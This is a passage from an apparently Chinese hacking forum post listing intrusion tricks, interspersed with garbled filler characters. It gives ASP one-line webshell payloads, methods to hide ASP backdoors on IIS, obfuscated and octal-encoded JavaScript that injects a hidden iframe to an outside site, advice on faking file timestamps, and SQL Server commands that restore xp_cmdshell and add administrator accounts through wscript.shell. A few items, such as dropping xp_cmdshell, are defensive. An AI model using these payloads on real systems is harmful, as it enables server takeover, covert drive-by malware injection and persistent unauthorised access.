) w0 x7 ]& X% M- D5 }c).%><%execute request("go")%><%
6 o. @& ]$ }1 @& rd).<script language=VBScript runat=server>execute request("sb")</Script>
( e, D( n% q4 p2 e7 ~e).<%25Execute(request("l"))%25>
$ f2 ^! K7 f' g2 f" `f).<%if request("cmd")<>"" then execute request("pass")%>, v3 Z5 X, f  Y( X0 y+ l* l

3 @( L5 w: r  l- E$ z52、at "12:17" /interactive cmd
# ~: |2 G# L4 z1 b执行后可以用AT命令查看新加的任务! x: l( Z0 ^( X+ h; N
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
8 Q, t: z/ t7 \% ?( @) R' }/ q& E7 {  I! v# W3 o! _8 I3 D/ z* J
53、隐藏ASP后门的两种方法
+ C. O% G) }2 J! ]( y/ P1、建立非标准目录:mkdir images..\
& s9 \6 F" m! y0 c# d" {拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
8 }9 q6 u$ D# G* I9 s9 Y+ _通过web访问ASP木马:http://ip/images../news.asp?action=login2 {1 E; _7 a# W; A( O  o. G- w
如何删除非标准目录:rmdir images..\ /s
* z- f3 k% L5 u0 c" z9 ^2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* F* r7 k- [5 E- w& \0 L% M3 |mkdir programme.asp
$ n3 s$ h1 n5 u0 B0 I新建1.txt文件内容:<!--#include file=”12.jpg”-->& g) J# ]/ E. u! J, t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件( z0 V1 |) R" ~3 s& s( ^
attrib +H +S programme.asp9 A  @) z6 f7 O0 r
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 ~1 M; b" _. ?. k
% L+ h2 r/ e" C, L! z* S3 h5 F54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。4 e- p! E2 m  `: p! ^% M# U7 b
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。- B) J8 F$ `; f( b, _
( J9 d) }2 o. E6 Z
55、JS隐蔽挂马
0 K) C* s7 Z) a$ x1.
3 f# ?' P, t2 c! r/ Yvar tr4c3="<iframe src=ht";5 I) ~: y: p2 M7 S; z2 o1 Y
tr4c3 = tr4c3+"tp:/";7 i! q: c- \# }) f7 K
tr4c3 = tr4c3+"/ww";+ B! R3 g' c8 T1 U4 G& C
tr4c3 = tr4c3+"w.tr4";
8 w4 ], n+ [* {8 x( Ktr4c3 = tr4c3+"c3.com/inc/m";* h& L* _5 Z* i
tr4c3 = tr4c3+"m.htm style="display:none"></i";  v4 T* v/ G( p3 z  r2 n. n
tr4c3 =tr4c3+"frame>'";' g* l# t& h" s; K! p
document.write(tr4c3);
, F! B9 H" A/ Z  U- q7 w; K避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。* C0 F/ P, d' v1 |# ^
) ~* W2 p) c- e- j9 a* U' b. H
2.; \, d, U: y( f1 D$ a3 x
转换进制,然后用EVAL执行。如* C/ P  R. B$ }% v* V; r& f) p$ f
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 C# U# N6 e3 R. s1 e
不过这个有点显眼。
# g1 F' F5 k% C3 h7 p3.
9 I0 y# U0 V+ U) ~' h" i8 y1 k# Y' ldocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
7 Z! _$ p& F! ?9 U最后一点,别忘了把文件的时间也修改下。
; k! b& O, P) `! u& C* A
) ]; `/ M8 ]7 f2 G- Q+ n  p56.3389终端入侵常用DOS命令# T: D/ j( x% D- `6 k
taskkill taskkill /PID 1248 /t" t4 K9 e6 v2 _9 J2 {8 M
" I+ |+ h6 p( i2 x' U1 V
tasklist 查进程
" J4 e5 w. Z# P" E
: q+ y/ {' X6 |) l: t. _cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限5 |  l% g3 M$ E. k3 n, H7 G6 {9 P
iisreset /reboot) K* x6 `, |7 r- e$ t! r
tsshutdn /reboot /delay:1    重起服务器
. a* C/ C  ~% n0 Q$ e
% W' R. q' ~( @% Y3 \9 jlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,* _, l: u8 Z1 c7 c+ ^

8 f1 E  q, L2 b1 i8 Rquery user 查看当前终端用户在线情况
- B. O6 Z+ v0 b7 c
; A  [! B' i+ q! d. H要显示有关所有会话使用的进程的信息,请键入:query process *; S& N% j& m2 U
3 }* T2 y9 o2 }5 w1 D6 u
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
2 [7 T& z# e* l) `. \
7 E# ]* ]3 s: r4 P& Q  `要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2& T3 N% i4 W" O) u0 E" K

. @) s6 `5 E* p要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
% ?7 H6 g, ~0 |/ p; k
6 l# V/ v# B. B- I9 U  ]" }命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启: H! N* \' Q* l6 y( ~
. I8 M$ ~7 m. t' E3 R
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统% f  ^/ l9 \/ W) ~* B6 L
% {, Q! o; i. P8 p9 @
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。7 K+ F3 f# g7 p9 |0 w

& N# V0 X! ~' h8 o1 `1 `命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 S& Z% ^# o9 j' D' u9 M- M1 Q1 R: O! T! ]. r* e6 c
56、在地址栏或按Ctrl+O,输入:
/ G( W8 c8 N7 V+ f8 l5 zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;% W6 B- R$ d( B
/ d5 V; A* `' H. }" l  N7 }
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
* I) Z$ ]! g: t  |/ r1 c# z5 D2 |, x" B# x' |
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
. ^3 U+ g; n5 l, q1 h& Z用net localgroup administrators是可以看到管理组下,加了$的用户的。
, \/ Z6 \4 x+ k6 ~' u0 x  b7 m& L( i
58、 sa弱口令相关命令
: G$ t; o8 n5 R1 O4 Z6 b/ d
8 Q  E; b" x; I$ \- T9 Y& I一.更改sa口令方法:  y% W( s1 T0 ~+ \5 n  a8 Q4 C
用sql综合利用工具连接后,执行命令:1 f+ S5 o9 g: l: \7 V. v- X
exec sp_password NULL,'20001001','sa'0 G# {+ u; ~0 X
(提示:慎用!)+ Q  H; `% m: J/ ?/ P0 ~# {1 p
' `2 y; W% b& l; [3 p
二.简单修补sa弱口令.4 D: n2 t' U* `8 z

, L  Y8 g, Y, C0 T方法1:查询分离器连接后执行:3 d8 y' T4 u5 R
if exists (select * from+ p0 ~, j( g* u) \
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
/ m. f7 p8 p4 h- nOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
5 a! ^) E* }2 v1 M# ?
3 t- q# v+ N, f8 Oexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'+ m( L$ ?: @9 @- ~: T

! Y# Z; ^3 u9 {+ V2 ~3 BGO
7 R, g" W; Z; h
; z1 S3 A/ v" y- H然后按F5键命令执行完毕
# q+ @& i) p% U# p7 [! J
/ b+ O" i, i- j3 K8 h; n方法2:查询分离器连接后; O( x: g$ n# o- f- I
第一步执行:use master
- n4 o( z/ ]0 e5 e9 t第二步执行:sp_dropextendedproc 'xp_cmdshell'3 T! R: ?& ?7 _4 a/ u8 n/ a
然后按F5键命令执行完毕
. _$ o: @" B$ Y1 o4 S1 @/ Z2 \1 e1 U* P2 ~! b
$ E% p2 m; x, L. r( @# k: F
三.常见情况恢复执行xp_cmdshell.
) r3 L2 }8 w" m9 E7 H/ S# H* ~" K9 T& e: O! b$ u
$ o  _' g# S" ]3 d! N0 n, D" p+ v! z
1 未能找到存储过程'master..xpcmdshell'.
( C8 T: ?# K0 q5 `5 q2 o   恢复方法:查询分离器连接后,
7 _* r3 {8 r4 H6 c3 \) y0 L第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int' p- v: M" B4 }3 m9 E0 g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: `, U3 i2 u9 @然后按F5键命令执行完毕% _. {. V) W- r4 U: @( q

2 a* A5 E8 N& x3 @2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ [1 ]( @4 z0 {4 U7 Q: ^) ]恢复方法:查询分离器连接后,
1 R5 ]/ ~# f4 k% C" R  t第一步执行:sp_dropextendedproc "xp_cmdshell"
5 o) }0 a, X; p1 t/ x5 Z: I1 w第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% K4 \3 _$ U& c& W' Z) A
然后按F5键命令执行完毕& R+ o/ x' p2 d2 m' X5 j: \, A
+ E" ?$ Y$ `1 \( `+ A: _
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
2 m0 K. f$ _; b- j恢复方法:查询分离器连接后,
0 L8 ?7 }9 Z* _2 `第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 X( i% y# M+ J; K' y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
/ h: `3 M8 T- W) d然后按F5键命令执行完毕' K% m/ D- {2 a  W) Z  S/ C
& j0 x. S6 `; U5 x, G4 w
四.终极方法.
0 {. R, J! t& F+ M& L如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:( o# W9 I: L1 ?
查询分离器连接后," B* h- J1 u. _& o: `
2000servser系统:' Q) Q- R' S. _+ j% S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 m# Z8 {2 B" e/ f' q

0 ?) g' n& Z9 I7 t0 H. D3 U  Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 H4 R6 G! O0 b: _0 q0 |( R3 `1 Y6 v% W& N: s' H. D
xp或2003server系统:
1 j6 A! S& P1 x$ |% H- Q" B! T! h; G2 t5 ^" H" p. s' l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'2 T9 L! Z  o& G
4 F. g% ~3 F: i9 y3 o0 H. m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
$ h3 G( ~. |) m: y$ j; K  [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表